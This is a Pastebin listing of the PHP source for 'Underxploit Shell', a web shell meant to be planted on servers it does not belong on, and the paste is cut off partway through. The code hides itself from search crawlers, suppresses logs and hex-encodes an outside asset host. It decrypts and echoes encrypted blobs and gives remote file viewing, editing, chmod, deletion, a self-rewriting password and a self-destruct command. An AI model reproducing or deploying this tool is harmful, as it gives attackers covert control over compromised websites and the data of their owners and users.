WILDAN_IZZUDIN

UNDERXPLOIT SHELL [1ST]

Dec 11th, 2017
699
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*! Description & About
  3.         * Underxploit Shell 0.0.1
  4.         * Responsive Version
  5.         * Source Viewer With Syntax Highligting
  6.         * Simple Gradient Alert
  7.         * Without Log's
  8.         * Clean Url
  9.         * Paralax Cover
  10.         * Programmed By Wildan Izzudin
  11.         * Web Shell (c) 2017
  12.         * Fix On 11, Dec 2017 (Monday)
  13. End !*/
  14. error_reporting(0);
  15. // --- pass : underxploit --- //
  16. $pass = "0bdec2f837ad15748be105faaf60db68";
  17. $_POST = cl($_POST);
  18. $_GET = cl($_GET);
  19. $_COOKIE = cl($_COOKIE);
  20. $_COEG = array_merge($_POST, $_GET);
  21. $_COEG = array_map("xp", $_COEG);
  22. $cookie = md5($_SERVER['HTTP_USER_AGENT']);
  23. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."-underxploit"])) {
  24. vb(md5($_SERVER['HTTP_HOST'])."underxploit", $cookie);
  25. }
  26. function vb($k, $v) {
  27.     $_COOKIE[$k] = $v;
  28.     setcookie($k, $v);
  29. }
  30. function mtr($y) {
  31.     echo('<meta http-equiv="refresh" content="1;url='.$y.'"/>');
  32.     return $y;
  33. }
  34. function deledir($dirname) {
  35.          if (is_dir($dirname))
  36.            $dir_handle = opendir($dirname);
  37.      if (!$dir_handle)
  38.           return false;
  39.      while($file = readdir($dir_handle)) {
  40.            if ($file != "." && $file != "..") {
  41.                 if (!is_dir($dirname."/".$file))
  42.                      unlink($dirname."/".$file);
  43.                 else
  44.                      deledir($dirname.'/'.$file);
  45.            }
  46.      }
  47.      closedir($dir_handle);
  48.      rmdir($dirname);
  49.      return true;
  50. }
  51. function a($x17) {
  52. @define("x13", "\x31\x33\x33\x37", true);
  53. $x14 = base64_decode($x17);
  54. $x16s = substr($x14, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC));
  55. $x19 = rtrim(
  56.     mcrypt_decrypt(
  57.         MCRYPT_RIJNDAEL_128,
  58.         hash('sha256', x13, true),
  59.         substr($x14, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $x16s), "\0");
  60. return $x19;
  61. }
  62. function x($b) {
  63.     $c = a($b);
  64. return $c;
  65. }
  66. @ini_set('error_log',NULL);
  67. @ini_set('log_errors',0);
  68. @ini_set('html_errors',0);
  69. @ini_set('max_execution_time',0);
  70. @ini_set('output_buffering',0);
  71. @ini_set('file_uploads',1);
  72. @set_time_limit(0);
  73. @clearstatcache();
  74. @define("x4", "\x68\x74\x74\x70\x3a\x2f\x2f\x78\x65\x72\x6f\x2e\x65\x73\x79\x2e\x65\x73\x2f\x6d\x65\x2f", true);
  75. @define("x5", "\x64\x69\x72\x3d", true);
  76. @define("x7", "\x63\x6f\x6d\x6d\x61\x6e\x64\x3d", true);
  77. @define("x6", "\x66\x69\x6c\x65\x3d", true);
  78. @define("x9", "\x3c\x64\x69\x76\x20\x63\x6c\x61\x73\x73\x3d\x27\x63\x6f\x4c\x2d\x6f\x70\x74\x69\x6f\x6e\x20\x74\x6f\x70\x27\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x63\x65\x6e\x74\x65\x72\x3e\x3c\x69\x20\x63\x6c\x61\x73\x73\x3d\x27\x66\x61\x20\x66\x61\x2d\x67\x65\x61\x72\x20\x66\x61\x2d\x33\x78\x20\x66\x61\x2d\x73\x70\x69\x6e\x27\x3e\x3c\x2f\x69\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x5b\x20\x42\x41\x44\x20\x52\x45\x51\x55\x45\x53\x54\x20\x5d\x3c\x2f\x63\x65\x6e\x74\x65\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x62\x72\x3e\x3c\x2f\x64\x69\x76\x3e\x3c\x2f\x64\x69\x76\x3e", true);
  79. @define("sec", $pass, true);
  80. if(isset($_COEG['dir'])) {
  81.         $dir = str_replace("\\", "/", $_COEG['dir']);
  82.         @chdir($dir);
  83.     } else {
  84.         $dir = str_replace("\\", "/", getcwd());
  85. }
  86. $dir= str_replace("\\","/", $dir);
  87. $scdir = explode("/", $dir);        
  88. function cl($arr){
  89.     $quotes_sybase = strtolower(ini_get('magic_quotes_sybase'));
  90. if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){
  91.         if(is_array($arr)){
  92.             foreach($arr as $k=>$v){
  93.                 if(is_array($v)) $arr[$k] = cl($v);
  94.                 else $arr[$k] = (empty($quotes_sybase) || $quotes_sybase === 'off')? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v));
  95.             }
  96.         }
  97.     }
  98.     return $arr;
  99. }
  100. function xp($str){
  101.     return (is_array($str))? array_map("rawurldecode", $str):rawurldecode($str);
  102. }
  103. function r($r) {
  104.     echo('<script>window.location = "'.$r.'";</script>');
  105.     return $r;
  106. }
  107. function s($s) {
  108.     echo 'notif({
  109.                 type: "default",
  110.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$s.'</font>",
  111.                 width: "all",
  112.                 height: 100,
  113.                 position: "center",
  114.             });';
  115.     return $s;
  116. }
  117. function error($text) {
  118. echo '<script> notif({
  119.                 type: "default",
  120.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
  121.                 width: "all",
  122.                 height: 100,
  123.                 position: "center",
  124.             });</script>';
  125. return $text;
  126. }
  127. function success($text) {
  128. echo '<script> notif({
  129.                 type: "default",
  130.                 msg: "<span class=\'alert\'><font color=\'#fff\'>'.$text.'</font>",
  131.                 width: "all",
  132.                 height: 100,
  133.                 position: "center",
  134.             });</script>';
  135. return $text;
  136. }
  137. if(get_magic_quotes_gpc()) {
  138.     function stripslashes_array($array) {
  139.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  140. }
  141.     $_COEG = stripslashes_array($_COEG);
  142.     $_COOKIE = stripslashes_array($_COOKIE);
  143. }
  144. if(!empty(sec)) {
  145.     if(isset($_COEG['pass']) && (md5($_COEG['pass']) == sec))         vb(md5($_SERVER['HTTP_HOST']), sec);
  146. if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != sec))
  147.         login();
  148. }
  149. function login() {
  150. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  151.         $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  152.           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  153.           header('HTTP/1.0 404 Not Found');
  154.           exit;
  155.      }
  156.  } die('<html><head>
  157. <title>LOGIN | UNDERXPLOIT SHELL [1ST]</title>
  158. <link rel="icon" href="http://xero.esy.es/me/favicon.ico" type="image/x-icon" />
  159. <meta property="og:image" content="http://xero.esy.es/me/logo.jpg">
  160. <meta name="viewport" content="width=device-width, initial-scale=1"><meta name="theme-color" content="#3c3b3f">
  161. <script src="http://xero.esy.es/me/jquery-2.js"></script>
  162. <script>baseUrl = window.location.href.split("?")[0]; window.history.pushState("name", "?", baseUrl);</script>
  163. <style>
  164. @import url("https://fonts.googleapis.com/css?family=Cabin");
  165. *{
  166.     box-sizing: border-box;
  167. }
  168.    body {
  169.       font-size: 15px;
  170.         color:#ddd;
  171.         margin:auto;
  172.         font-family: "Cabin";
  173.         color:#ddd;
  174.         margin:auto;
  175.         font-family: "Cabin";
  176.       background:url("http://xero.esy.es/me/bg.jpg") fixed no-repeat;
  177.         background-size: cover;
  178. }
  179. ::selection {
  180.    background-color: rgba(201,223,255,0.2);
  181.    color: #ffffff;
  182. }
  183. ::-moz-selection {
  184.    background-color: rgba(201,223,255,0.1);
  185.    color: #ffffff;
  186. }
  187. .image {
  188.     width:150px;
  189.     height:150px;
  190.     border-radius: 100%;
  191.     padding:2px;
  192.     border: 1px solid #ddd;
  193. }
  194. .animasi{opacity: 0.2;-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}
  195. .animasi.infinite{opacity: 0.2;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}
  196. .animasi:hover{opacity: 0.2;-webkit-animation-duration:0.1s;animation-duration:0.1s;}
  197.        @-webkit-keyframes anim1{from,20%,40%,60%,80%,to{-webkit-animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000);animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000)}0%{opacity:0;-webkit-transform:scale3d(.3,.3,.3);transform:scale3d(.3,.3,.3)}20%{-webkit-transform:scale3d(1.1,1.1,1.1);transform:scale3d(1.1,1.1,1.1)}40%{-webkit-transform:scale3d(.9,.9,.9);transform:scale3d(.9,.9,.9)}60%{opacity:1;-webkit-transform:scale3d(1.03,1.03,1.03);transform:scale3d(1.03,1.03,1.03)}80%{-webkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97)}to{opacity:1;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}@keyframes anim1{from,20%,40%,60%,80%,to{-webkit-animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000);animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000)}0%{opacity:1;-webkit-transform:scale3d(1.0,1.0,1.0);transform:scale3d(1.0,1.0,1.0)}20%{-webkit-transform:scale3d(1.1,1.1,1.1);transform:scale3d(1.1,1.1,1.1)}40%{-webkit-transform:scale3d(.9,.9,.9);transform:scale3d(.9,.9,.9)}60%{opacity:1;-webkit-transform:scale3d(1.03,1.03,1.03);transform:scale3d(1.03,1.03,1.03)}80%{-webkit-transform:scale3d(.97,.97,.97);transform:scale3d(.97,.97,.97)}to{opacity:1;-webkit-transform:scale3d(1,1,1);transform:scale3d(1,1,1)}}.anim1{-webkit-animation-name:anim1;animation-name:anim1}
  198. input[type=password] {
  199.     padding: 7px;
  200.     background: rgba(255,255,255,0.1);
  201.     border:0px;
  202.     border-bottom: 0px solid #ddd;
  203.     color: #ddd;
  204.     font-family: "Cabin";
  205.     text-align:center;
  206.     font-size:15px;
  207.     border-radius:0.3em
  208. }
  209. h3 {
  210.     font-weight: 100;
  211. }
  212. .wrap {
  213.     width: 350px;
  214.     background: -moz-linear-gradient(top, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%); /* FF3.6-15 */
  215.  background: -webkit-linear-gradient(top, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%); /* Chrome10-25,Safari5.1-6 */
  216.  background: linear-gradient(to bottom, rgba(201,223,255,0.1) 0%, rgba(201,223,255,0) 50%, rgba(201,223,255,0.1) 100%);
  217.  box-shadow: inset 0 0 1px rgba(255,255,255,0.5), 0px 0px 20px rgba(0,0,0,0.5);
  218.   border-radius: 0.3em;
  219.     padding: 30px;
  220.     margin: 20px;
  221. }
  222. ::-webkit-input-placeholder { /* Chrome/Opera/Safari */
  223.  color: #ddd;
  224. }
  225. ::-moz-placeholder { /* Firefox 19+ */
  226.  color: #ddd;
  227. }
  228. :-ms-input-placeholder { /* IE 10+ */
  229.  color: #ddd;
  230. }
  231. :-moz-placeholder { /* Firefox 18- */
  232.  color: #ddd;
  233. }
  234.  
  235. /* Design By Wildan Izzudin */
  236. @media screen and (max-width: 2024px) {
  237.    .wrap {
  238.         width: 350px;
  239.                margin-top:160px;
  240.     }
  241. }
  242. @media screen and (max-width: 1024px) {
  243.     .wrap {
  244.         width: 350px;
  245.                margin-top:50px;
  246.     }
  247. }
  248. @media screen and (max-width: 780px) {
  249.     .wrap {
  250.         width: auto;
  251.                margin-top:50px;
  252.     }
  253. }
  254. </style>
  255. </head><body>
  256. <center>
  257. <div class="wrap">
  258.             <h3>Underxploit Shell [1st]</h3>
  259.             <img src="http://xero.esy.es/me/logo.jpg" class="image animasi infinite anim1"><br><br>
  260.             <form action="" method="post"><input type="password" placeholder="" name="pass"></div>');
  261. }
  262. ?>
  263. <?php
  264. echo('<html><head><title>UNDERXPLOIT SHELL [1ST]</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
  265. <link rel="icon" href="'.x4.'favicon.ico" type="image/x-icon" />
  266.     <meta property="og:image" content="'.x4.'logo.jpg"><meta name="theme-color" content="#3c3b3f"><link rel="stylesheet" type="text/css" href="'.x4.'style.css"><link rel="stylesheet" type="text/css" href="'.x4.'alert.css"><script type="text/javascript" src="'.x4.'alert.js"></script><script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js"></script><link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"/><script type="text/javascript" src="'.x4.'jquery.js"></script>
  267. <script>
  268.     function c(x) {
  269.         window.location = x
  270.         }
  271. </script>');
  272. echo(x("\x73\x66\x38\x76\x34\x4e\x73\x44\x2b\x31\x31\x35\x73\x73\x49\x42\x6e\x61\x43\x42\x6b\x67\x35\x47\x41\x62\x71\x77\x73\x68\x33\x65\x6c\x48\x56\x66\x42\x2f\x4b\x69\x37\x38\x4a\x6e\x4a\x74\x6a\x58\x57\x70\x2b\x30\x67\x38\x67\x41\x38\x70\x59\x76\x46\x71\x6c\x4a\x63\x72\x53\x43\x62\x76\x6a\x65\x49\x63\x39\x76\x32\x4e\x5a\x30\x49\x43\x30\x7a\x2f\x76\x63\x77\x6b\x38\x56\x30\x47\x61\x33\x44\x59\x52\x37\x4a\x39\x38\x77\x46\x78\x2f\x55\x41\x6f\x42\x37\x45\x76\x6b\x62\x6a\x58\x41\x64\x39\x67\x63\x67\x4a\x68\x6e\x34\x4c\x61\x63\x58\x31\x54\x43\x74\x47\x72\x72\x5a\x43\x41\x73\x53\x36\x75\x61\x38\x6d\x43\x78\x7a\x75\x76\x33\x7a\x50\x55\x52\x68\x30\x43\x33\x65\x4e\x7a\x44\x67\x58\x56\x41\x30\x3d"));
  273. echo(x("\x68\x2f\x67\x43\x67\x35\x4b\x57\x39\x33\x55\x57\x39\x70\x78\x58\x4d\x73\x4e\x74\x31\x73\x4f\x6a\x67\x71\x72\x59\x4b\x4f\x4b\x50\x4d\x61\x70\x4a\x56\x78\x4f\x6c\x71\x67\x65\x71\x76\x44\x47\x6d\x72\x65\x6c\x35\x76\x75\x2f\x2f\x33\x52\x76\x50\x6a\x41\x73\x59\x4c\x55\x61\x61\x72\x6f\x79\x44\x67\x61\x72\x77\x51\x74\x42\x70\x69\x6a\x59\x70\x5a\x65\x6d\x4a\x55\x79\x50\x37\x51\x32\x6c\x33\x59\x69\x53\x6e\x67\x49\x36\x64\x71\x2f\x77\x59\x58\x58\x68\x5a\x78\x4e\x74\x64\x6c\x37\x64\x2b\x56\x5a\x66\x68\x76\x46\x4f\x76\x37\x45\x39\x6c\x47\x74\x36\x6b\x44\x41\x45\x55\x6f\x70\x58\x7a\x6f\x70\x6b\x41\x43\x6b\x61\x41\x4f\x52\x32\x76\x77\x32\x39\x67\x72\x50\x34\x47\x6c\x65\x50\x2b\x31\x31\x64\x45\x55\x6b\x77\x79\x2b\x66\x6c\x6c\x32\x53\x73\x5a\x39\x42\x75\x49\x72\x35\x50\x77\x30\x52\x61\x62\x53\x52\x38\x6a\x52\x7a\x50\x62\x59\x6e\x33\x6f\x52\x47\x55\x57\x55\x78\x70\x58\x30\x77\x64\x48\x31\x53\x4b\x47\x73\x6b\x59\x52\x38\x71\x51\x34\x47\x4f\x78\x30\x47\x2b\x56\x42\x72\x58\x2f\x67\x49\x50\x37\x51\x6a\x6d\x75\x55\x47\x54\x43\x39\x78\x4d\x5a\x50\x73\x32\x6f\x6e\x79\x6e\x31\x54\x75\x43\x74\x48\x69\x45\x51\x4a\x38\x51\x6f\x67\x49\x58\x4d\x32\x4f\x79\x72\x53\x4f\x2b\x51\x68\x31\x7a\x62\x4d\x44\x2f\x38\x3d"));
  274. echo('<i class="fa fa-chevron-up move-top"></i>');
  275. echo('<script>
  276. jQuery(document).ready(function() {
  277.    var offset = 220;
  278.    var duration = 500;
  279.    jQuery(window).scroll(function() {
  280.        if (jQuery(this).scrollTop() > offset) {
  281.            jQuery(\'.move-top\').fadeIn(duration);
  282.        } else {
  283.            jQuery(\'.move-top\').fadeOut(duration);
  284.        }
  285.    });
  286.    jQuery(\'.move-top\').click(function(event) {
  287.        event.preventDefault();
  288.        jQuery(\'html, body\').animate({scrollTop: 0}, duration);
  289.        return false;
  290.    })
  291. });
  292. </script>');
  293. echo('<script>hljs.initHighlightingOnLoad();</script>
  294. </head></body>
  295. <div class="co-ontainer-2">
  296. <div class="atas">
  297. <div class="menus">
  298. <button class="xa" onclick=\'c("'.$_SERVER['PHP_SELF'].'")\'><i class="fa fa-home"></i></button>
  299. <button class="xa" onclick=\'c("?'.x5.getcwd().'&'.x7.'about")\'><i class="fa fa-question"></i></button>
  300. <button class="xa" onclick=\'c("?'.x5.getcwd().'&'.x7.'logout")\'><i class="fa fa-power-off"></i></button></div></div>
  301. <div class="dir">
  302. <table style="width:100%">
  303. <td style="width:100%"><div class="dir-pallet"><table><td class="dir-td-left"><font color="#ddd">ROOT</font> :</td><td class="dir-td-right break wrap">');
  304. foreach($scdir as $c_dir => $cdir) {   
  305.     echo "<a class='a' onclick=\"c('?dir=";
  306.     for($i = 0; $i <= $c_dir; $i++) {
  307.         echo $scdir[$i];
  308.         if($i != $c_dir) {
  309.         echo "/";
  310.         }
  311.     }
  312.     echo "')\">$cdir</a>/";
  313. }
  314. echo("</td></table></div></th></table></div>");
  315. $filez = basename($_COEG['file']);
  316. $size = filesize("$dir/$filez")/1024;
  317.             $size = round($size,3);
  318.             if($size > 1024) {
  319.                 $size = round($size/1024,2). ' MB';
  320.             } else {
  321.                 $size = $size. ' KB';
  322. }
  323. echo('<div class="coL">');
  324.  
  325.  
  326. if($_COEG['command'] == 'logout') {
  327. r($_SERVER['PHP_SELF']);
  328. setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
  329. }  
  330. elseif($_COEG['command'] == 'view') {
  331. echo '<div class="coL-panel"><table>
  332. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
  333. echo '<div class="coL-option">';
  334. echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  335. <hr>';
  336. echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
  337. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  338. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  339. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  340. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  341. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  342. if(empty($source)) {
  343.     error('Source Not Found !!');
  344.     echo x9;
  345. } else {
  346.     echo "<pre class='top'><code class='php'>".$source."</code></pre></div>";
  347.     }
  348. }
  349.  
  350. // --- edit file --- //
  351. elseif($_COEG['command'] == 'edit') {
  352.     if($_COEG['save']) {
  353.         $save = file_put_contents($_COEG['file'], $_COEG['src']);
  354.     if($save) {
  355.     success('Source Saved !!');
  356.         } else {
  357.     error('Permission Denied !!');
  358.     }
  359. }
  360. echo '<div class="coL-panel"><table>
  361. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">EDIT FILE</td></table></div>';
  362. echo '<div class="coL-option">
  363. <table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  364. <hr><table>';
  365. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  366. <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
  367. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  368. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  369. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  370. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
  371. if(empty($source)) {
  372.     echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."'  style='margin:0px'>
  373.     <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
  374. <input type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
  375. } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
  376.     <textarea name='src' class='top'>".$source."</textarea>
  377. <input type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form></div>";
  378.   }
  379. }
  380.  
  381. // --- rename file --- //
  382. elseif($_COEG['command'] == 'rename') {
  383.         if($_COEG['rename']) {
  384.         $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
  385.         if($rename) {
  386. success('File Renamed !!');
  387. mtr("?".x7."rename&".x5.$dir."&".x6.$dir."/".$_COEG["rename"]);
  388.    } else {
  389. error('Permission Denied !!');
  390.         }
  391. }
  392. echo '<div class="coL-panel"><table>
  393. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">RENAME FILE</td></table></div>';
  394. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  395. <hr><table>';
  396. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  397. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  398. <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
  399. <th><a onclick=\"c('?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
  400. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  401. echo "<div class='coL-option top'>
  402. <br><br><br>
  403.     <center>
  404.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  405. echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  406. <table cellspacing='0'>
  407.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
  408.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  409.     </form></div></div>";
  410. }
  411.  
  412. // --- chmod --- //
  413. else if($_COEG['command'] == 'chmod') {
  414. if(isset($_COEG['perm'])) {
  415. if(chmod($_COEG['file'],$_COEG['perm'])) {
  416. success('Chmod Ok !!');
  417. } else {
  418. error('Permission Denied !!');
  419.     }
  420. }
  421. echo '<div class="coL-panel"><table>
  422. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CHMOD FILE</td></table></div>';
  423. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="lime">[</font> '.basename($_COEG['file']).' <font color="lime">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
  424. <hr><table>';
  425. echo "<th><a onclick=\"c('?".x7."view&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
  426. <th><a onclick=\"c('?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
  427. <th><a onclick=\"c('?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
  428. <th><button class='coL-btn-option-active'><i class='fa fa-cogs'></i></button></th>
  429. <th><a onclick=\"c('?".x7."delete&".x5.$dir."&".x6.$_COEG['file']."')\"><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
  430. echo "<div class='coL-option top'>
  431. <br><br><br>
  432.     <center>
  433.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
  434. echo "<form action='?".x7."chmod&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
  435. <table cellspacing='0'>
  436.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'>
  437. <input type='text' value='".substr(sprintf("%o", fileperms($_COEG['file'])), -4)."' name='perm' style='width:100%'>
  438. <input type='hidden' name='path' value='".$_COEG['file']."'></td><td style='width:20%'>
  439.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
  440.     </form></div></div>";
  441. }
  442.  
  443. // --- delete file --- //
  444. elseif($_COEG['command'] == 'delete') {
  445. $delete = unlink($_COEG['file']);
  446. if($delete) {
  447.         echo('<script>c("?'.x5.$dir.'");</script>');
  448.     } else {
  449.         error('Permission Denied !!');
  450.     }
  451. }
  452.  
  453. // --- change password --- //
  454. elseif($_COEG['command'] == 'change') {
  455. echo('<div class="coL-panel"><table>
  456. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
  457. echo('<script>
  458. function validate(){
  459.             var a = document.getElementById("newpass").value;
  460.            var b = document.getElementById("confirm").value;
  461.            if (a!=b) {');
  462.       s('Password Do Not Match !!');
  463.             echo('return false;
  464.     }
  465. }
  466.     </script>');
  467. function xs($file){
  468.     return file_get_contents($file);
  469. }
  470. function chipt($plain){
  471.         return md5($plain);
  472. }
  473. function changepass($plain){
  474.     $npass = chipt($plain);
  475.     $npass = "\$pass = \"".$npass."\";";
  476.     $con = xs($_SERVER['SCRIPT_FILENAME']);
  477.     $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
  478.     return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
  479. }
  480.  
  481. if($_COEG['newpass']) {
  482. if(changepass($_COEG['newpass'])) {
  483. success('Password Changed !!');
  484. mtr('?'.x5.$dir.'&'.x7.'logout');
  485. } else {
  486. error('Unable To Change Password !!');
  487.     }
  488. }
  489. echo "<div class='coL-option top'>
  490. <form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
  491. <td style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
  492. <tr>
  493. <td style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
  494. <tr>
  495. <td style='width:120px'></td><td style='width:75%'>
  496. <button type='submit' name='cps' class='btn-exe' onclick='saveForm();return false;' style='width:100px'><i class='fa fa-arrow-circle-right'></i></button></td></table></form></div></div>";
  497. echo '<script>function saveForm(){
  498. if(document.getElementById("newpass").value == ""){';
  499.        s('Enter New Password !!');
  500.    echo'document.getElementById("newpass").focus();
  501.      return false;
  502.    }
  503. if(document.getElementById("confirm").value == ""){';
  504.       s('Confirm Your Password !!');
  505.    echo'return false;
  506.    }
  507.    document.getElementById("sks").submit();
  508.  }
  509. </script>';
  510. }
  511.  
  512. // --- kill me --- //
  513. elseif($_COEG['command'] == 'kill') {
  514. if(file_exists("underxploit.php"))
  515. unlink("underxploit.php");unlink(__FILE__);
  516.     success('Good Bye Baby :\')');
  517.     mtr('http://underxploit.blogspot.com');
  518. }
  519.  
  520. // --- rename directory --- //
  521. elseif($_COEG['command'] == 'renadir') {
  522.    $c = $_COEG['e'];
  523.     if($_COEG['e']) {
  524.         $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
  525.         if($e) {
  526. echo('<script>c("?'.x5.dirname($dir).'");</script>');
  527.     } else {
  528. error('Permission Denied !!');
  529.     }
  530. }
  531. echo('<div class="coL-panel"><table>
  532. <td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
  533. echo("<div class='coL-option top'>
  534. <br><br><br>
  535.     <center>
  536.         <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
  537. echo("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
  538. <table cellspacing='0'>
